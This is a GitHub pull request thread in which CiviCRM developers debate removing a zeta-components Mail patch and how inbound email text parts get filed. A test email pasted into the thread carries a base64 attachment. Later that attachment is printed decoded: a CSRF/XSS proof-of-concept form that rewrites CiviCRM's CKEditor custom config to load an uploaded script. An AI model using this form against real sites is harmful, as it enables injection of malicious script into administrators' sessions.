Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

dev/core#5569 Remove obsolete zeta-patch #30969

Closed
wants to merge 3 commits into from

Conversation

eileenmcnaughton
Copy link
Contributor

The is identified in the comment as having been found in tests and in the PR as being a port of something already merged upstream
#24019

so we should be able to drop it and if there were any issue tests would fail

Copy link

civibot bot commented Aug 25, 2024

🤖 Thank you for contributing to CiviCRM! ❤️ We will need to test and review this PR. 👷

Introduction for new contributors...
  • If this is your first PR, an admin will greenlight automated testing with the command ok to test or add to whitelist.
  • A series of tests will automatically run. You can see the results at the bottom of this page (if there are any problems, it will include a link to see what went wrong).
  • A demo site will be built where anyone can try out a version of CiviCRM that includes your changes.
  • If this process needs to be repeated, an admin will issue the command test this please to rerun tests and build a new demo site.
  • Before this PR can be merged, it needs to be reviewed. Please keep in mind that reviewers are volunteers, and their response time can vary from a few hours to a few weeks depending on their availability and their knowledge of this particular part of CiviCRM.
  • A great way to speed up this process is to "trade reviews" with someone - find an open PR that you feel able to review, and leave a comment like "I'm reviewing this now, could you please review mine?" (include a link to yours). You don't have to wait for a response to get started (and you don't have to stop at one!) the more you review, the faster this process goes for everyone 😄
  • To ensure that you are credited properly in the final release notes, please add yourself to contributor-key.yml
  • For more information about contributing, see CONTRIBUTING.md.
Quick links for reviewers...

➡️ Online demo of this PR 🔗

@eileenmcnaughton
Copy link
Contributor Author

OK - so if failed - but trying to see if we can upstream - or at least be clearly trying zetacomponents/Mail#95

@seamuslee001
Copy link
Contributor

@eileenmcnaughton I always thought that this patch was necessary because of our first custom patch

@eileenmcnaughton
Copy link
Contributor Author

OK - so we are applying a patch to zeta-components that specifically breaks zeta-components & is demonstrated to do so in their test

image

@eileenmcnaughton
Copy link
Contributor Author

@seamuslee001 yeah - our custom patch is weird - it seems like we broke the upstream for a specific thing that wasn't working for us? I'm trying to figure out if we have a test for that thing since it seems weird to hack an upstream package to not work right (per their tests) - or if we can just set if ( (ezcMailPartParser::$parseTextAttachmentsAsFiles === true) to FALSE

The is identified in the comment as having been found in tests and in the PR as
being a port of something already merged upstream
civicrm#24019

so we should be able to drop it and if there were any issue
tests would fail
@eileenmcnaughton
Copy link
Contributor Author

@seamuslee001 the first custom patch links to the upstreamed one zetacomponents/Mail#86

@eileenmcnaughton
Copy link
Contributor Author

So this is the report https://civicrm.stackexchange.com/questions/30511/auto-filing-e-mails-on-cases-mail-content-not-shown-under-details-and-attachmen

It seems that there is a setting as to whether to treat text attachments as files & we don't want it to but rather than setting it to FALSE when we instantiate we are qualifying it......

@eileenmcnaughton
Copy link
Contributor Author

hmm - I tried generating the emails the original patch was for in thunderbird & gmail & it looks a lot like the email applications may do things a bit more robustly than they did 5 years ago

@seamuslee001
Copy link
Contributor

@demeritcowboy you were involved in the initial ticket do you have a feeling here? I'm not sure if they are all doing the right thing these days

@eileenmcnaughton
Copy link
Contributor Author

I've attached examples for the 2 clients from SE with both attached & generated - the next steps are

  1. confirm expected behaviour - I think what we have done is hacked zeta-mail to make sure attached ics show up as attachments in civi
  2. write test to cover
  3. if necessary either upstream the patch to zeta or (more likely) either drop it entirely or update InboundMail to handle better - it seems unlikely that we are super special in our requirements so I expect we are just carrying technical debt cos we didn't do it the right way - however if there IS a usecase to upstream the maintainer has been super responsive

Worst case scenario we could combine the 2 patches into 1 as the first patch adds the bug the second fixe

@eileenmcnaughton
Copy link
Contributor Author

& just as I was typing super-responsive zetacomponents/Mail#95 (comment)

@demeritcowboy
Copy link
Contributor

What I remember is that attachments stopped working for filing inbound emails (I don't think it was specific to ics - I think that's a red herring further confused by the ".unknown" part which would have happened anyway with ics - my memory says it broke all attachments). The reason it broke was because zeta used to be forked, and live in its own repo. Then it was unforked, and in the process of doing that some civi-specific changes were dropped. In particular this one: civicrm/zetacomponents-mail@0401301, so it was added back as a composer patch.

@demeritcowboy
Copy link
Contributor

So in terms of confirming expectations, it's that attachments in inbound emails get filed properly, both their content and that ones that shouldn't be listed as ".unknown" aren't. I can try testing if that still happens without the patch.

@seamuslee001
Copy link
Contributor

also @demeritcowboy I think it is that the content of emails as well isn't stored as an attachment but in the activity details section right?

@seamuslee001
Copy link
Contributor

I wonder if this test fail is pointing to something

CRM_Utils_Mail_EmailProcessorInboundTest::testFetchActivitiesWithManyAttachments
Failed asserting that 6 matches expected 4.

/home/homer/buildkit/build/build-3/web/sites/all/modules/civicrm/tests/phpunit/CRM/Utils/Mail/EmailProcessorInboundTest.php:133
/home/homer/buildkit/build/build-3/web/sites/all/modules/civicrm/tests/phpunit/CiviTest/CiviUnitTestCase.php:291
/home/homer/buildkit/extern/phpunit9/phpunit9.phar:2520

@seamuslee001
Copy link
Contributor

Looking at this https://github.com/civicrm/civicrm-core/blob/master/tests/phpunit/CRM/Utils/Mail/data/inbound/test_message_many_attachments.eml I suspect possibly what is happening here is that the Text/Plain and the text/Html parts are being converted into attachments as well as the 4 attached files

@demeritcowboy
Copy link
Contributor

I don't remember but the goal is that any multipart that isn't text/plain or text/html should get filed as an attachment in civi. If it's in the "safe" list of file types then it should have its normal filename, otherwise it should have .unknown.

@demeritcowboy
Copy link
Contributor

Yes probably - the text/plain and text/html should be in the details section.

@seamuslee001
Copy link
Contributor

seamuslee001 commented Aug 26, 2024

so I sent myself an email with 3 separate attachments 1 a PDF 1 a Word Doc and 1 a txt file

MIME-Version: 1.0
Date: Tue, 27 Aug 2024 09:28:55 +1000
Message-ID: <CAB5wLF-6rJpx4k4CsBUM9LPhaqehZYghtCZdzb_6GioHLy6JOg@mail.gmail.com>
Subject: test txt attachment
From: Seamus Lee <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="0000000000000f1e9806209e7d06"

--0000000000000f1e9806209e7d06
Content-Type: multipart/alternative; boundary="0000000000000f1e9606209e7d04"

--0000000000000f1e9606209e7d04
Content-Type: text/plain; charset="UTF-8"

test

-- 
Seamus Lee


JMA Consulting

He/Him/His
[image: mobilePhone] +61 421 460 312 <+61+421+460+312>
[image: website] https://jmaconsulting.biz

--0000000000000f1e9606209e7d04
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable


--0000000000000f1e9606209e7d04--
--0000000000000f1e9806209e7d06
Content-Type: text/plain; charset="UTF-8"; name="2_load_xss.html.txt"
Content-Disposition: attachment; filename="2_load_xss.html.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_m0bmqmih2
Content-ID: <f_m0bmqmih2>

77u/PGh0bWw+DQo8Zm9ybSBlbmN0eXBlPSJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29k
ZWQiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSJodHRwOi8vbG9jYWxob3N0L3dwLWFkbWluL2FkbWlu
LnBocD9wYWdlPUNpdmlDUk0mcT1jaXZpY3JtJTJGYWRtaW4lMkZja2VkaXRvciI+DQo8aW5wdXQg
dHlwZT0idGV4dCIgdmFsdWU9Im1vb25vIiBuYW1lPSJjb25maWdfc2tpbiI+IDxicj4NCjxpbnB1
dCB0eXBlPSJ0ZXh0IiB2YWx1ZT0iQ0tFRElUT1IuZWRpdG9yQ29uZmlnID0gZnVuY3Rpb24oIGNv
bmZpZyApIHt9OyIgbmFtZT0iY29uZmlnIj4gPGJyPg0KPGlucHV0IHR5cGU9InRleHQiIHZhbHVl
PSIiIG5hbWU9ImNvbmZpZ19leHRyYVBsdWdpbnMiPiA8YnI+DQo8aW5wdXQgdHlwZT0idGV4dCIg
dmFsdWU9Ii4uLy4uLy4uLy4uLy4uL3VwbG9hZHMvY2l2aWNybS9wZXJzaXN0L2NybS1ja2VkaXRv
ci14c3MuanMiIG5hbWU9ImNvbmZpZ19jdXN0b21Db25maWciPiA8YnI+DQo8aW5wdXQgdHlwZT0i
c3VibWl0IiB2YWx1ZT0iUlVOIFBPQyI+DQo8L2Zvcm0+DQo8L2h0bWw+
--0000000000000f1e9806209e7d06
Content-Type: application/msword; name="form_03.doc"
Content-Disposition: attachment; filename="form_03.doc"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_m0bmqhqx1
Content-ID: <f_m0bmqhqx1>


--0000000000000f1e9806209e7d06
Content-Type: application/pdf; name="2932_1 Ward Grouped Mayor-Lismore.pdf"
Content-Disposition: attachment; filename="2932_1 Ward Grouped Mayor-Lismore.pdf"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_m0bmqhpv0
Content-ID: <f_m0bmqhpv0>


--0000000000000f1e9806209e7d06--

You will note for the .txt attachment the content type is text/plain so I think the purpose of our patch was to stop the body sections text/html and text/plain from being caught in the file processing instead only capture the actual attachments I think

@demeritcowboy
Copy link
Contributor

That sounds consistent with everything so far.

@demeritcowboy
Copy link
Contributor

Just confirming yes without the patch all inbound emails come in with .unknown attachments for the text and html parts instead of putting it in the details.

@demeritcowboy
Copy link
Contributor

Now how to explain this to derrick... although I don't think it's civi-specific really, because it makes sense that attachment dispositions should use the fileparser.

@seamuslee001
Copy link
Contributor

@demeritcowboy this was my attempt on that zetacomponents/Mail#95 (comment)

@demeritcowboy
Copy link
Contributor

I think what it is that the setting "parseTextAttachmentsAsFiles" means "parse all text attachments as files, regardless of disposition", which yeah isn't quite what civi wants. Let's try just turning that off...

@seamuslee001
Copy link
Contributor

@demeritcowboy I think turning it off would mean .txt attachments would show up in the activity details section right? but maybe we don't really get .txt attachments with emails these days or maybe .json ones? (not sure what json would attachment would show up on the content type)

@demeritcowboy
Copy link
Contributor

I'm hoping elsewhere somewhere it takes disposition into account regardless of content type when it's off. I'm trying it now.

@eileenmcnaughton
Copy link
Contributor Author

@demeritcowboy @seamuslee001 is it a problem with the library or our usage? ie should we be doing extra parsing on what zeta components return to decide how we want to store it in CiviCRM - ie should we be letting it convert to a file but then reading that file into the details section if it is of type text, json or ical (well not quite sure what is right with ical but I know it was the type discussed in the issue

@seamuslee001 did you try processing that text file into CiviCRM - I'm just wondering cos I thought the multipart went down a different path that had been improved over the years

@demeritcowboy
Copy link
Contributor

Yeah it's not that simple. It inserts it into the activity details.

@demeritcowboy
Copy link
Contributor

@eileenmcnaughton We could reparse it but not sure how much work it is offhand, since we still need to get at the disposition to determine what we want to do with it. The simplest patch seems like the one we have. Is it conflicting with something upstream? Why can't we keep it?

@seamuslee001
Copy link
Contributor

I would vote for combining the two patches into 1, I don't see why we shouldn't keep the patch

@eileenmcnaughton
Copy link
Contributor Author

eileenmcnaughton commented Aug 27, 2024

I think we should upstream it rather than carrying it forever as technical debt or else people will need to figure it out every now & then until we do (either due to updates or because people have unhacked versions with their CMS)- work deferred but not reduced. It would be different if the upstream maintainer had a history of being unresponsive but that is the opposite of the situation here

I don't think it's hard to upstream it if we can articulate what we are trying to do. Probably we can negotiate a more nuanced meaning for ezcMailPartParser::$parseTextAttachmentsAsFiles

@eileenmcnaughton
Copy link
Contributor Author

eileenmcnaughton commented Aug 27, 2024

OK - so with the email above
We have 4 bits of data

  • the body text
  • the pdf attachment
  • the word attachment
  • the text attachment
  1. Unhacked civi with $parser->options->parseTextAttachmentsAsFiles = FALSE; we get
    attachments
  • the pdf
  • the word
    body
  • the body text + text attachment inlined
  1. Unhacked civi with $parser->options->parseTextAttachmentsAsFiles = TRUE;
    attachments
  • the pdf
  • the word
  • the text attachement
  • the inline body text as text attachment
  • the inline body text as an html attachment
    body
  • empty(ish)

Scenario 1

-ALTERNATIVE ITEM 0-

test

--
Sam Lee


Big Business

He/Him/His

-ALTERNATIVE ITEM 1-


-ALTERNATIVE END-

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://localhost/wp-admin/admin.php?page=CiviCRM&q=civicrm%2Fadmin%2Fckeditor">
<input type="text" value="moono" name="config_skin"> <br>
<input type="text" value="CKEDITOR.editorConfig = function( config ) {};" name="config"> <br>
<input type="text" value="" name="config_extraPlugins"> <br>
<input type="text" value="../../../../../uploads/civicrm/persist/crm-ckeditor-xss.js" name="config_customConfig"> <br>
<input type="submit" value="RUN POC">
</form>
</html>

** scenario 2**
-ALTERNATIVE ITEM 0- -ALTERNATIVE ITEM 1- -ALTERNATIVE END-

@eileenmcnaughton eileenmcnaughton changed the title Remove obsolete zeta-patch dev/core#5569 Remove obsolete zeta-patch Oct 31, 2024
@eileenmcnaughton
Copy link
Contributor Author

Closing this & returning to gitlab as I don't see it being reviewable anytime soon

@eileenmcnaughton
Copy link
Contributor Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

4 participants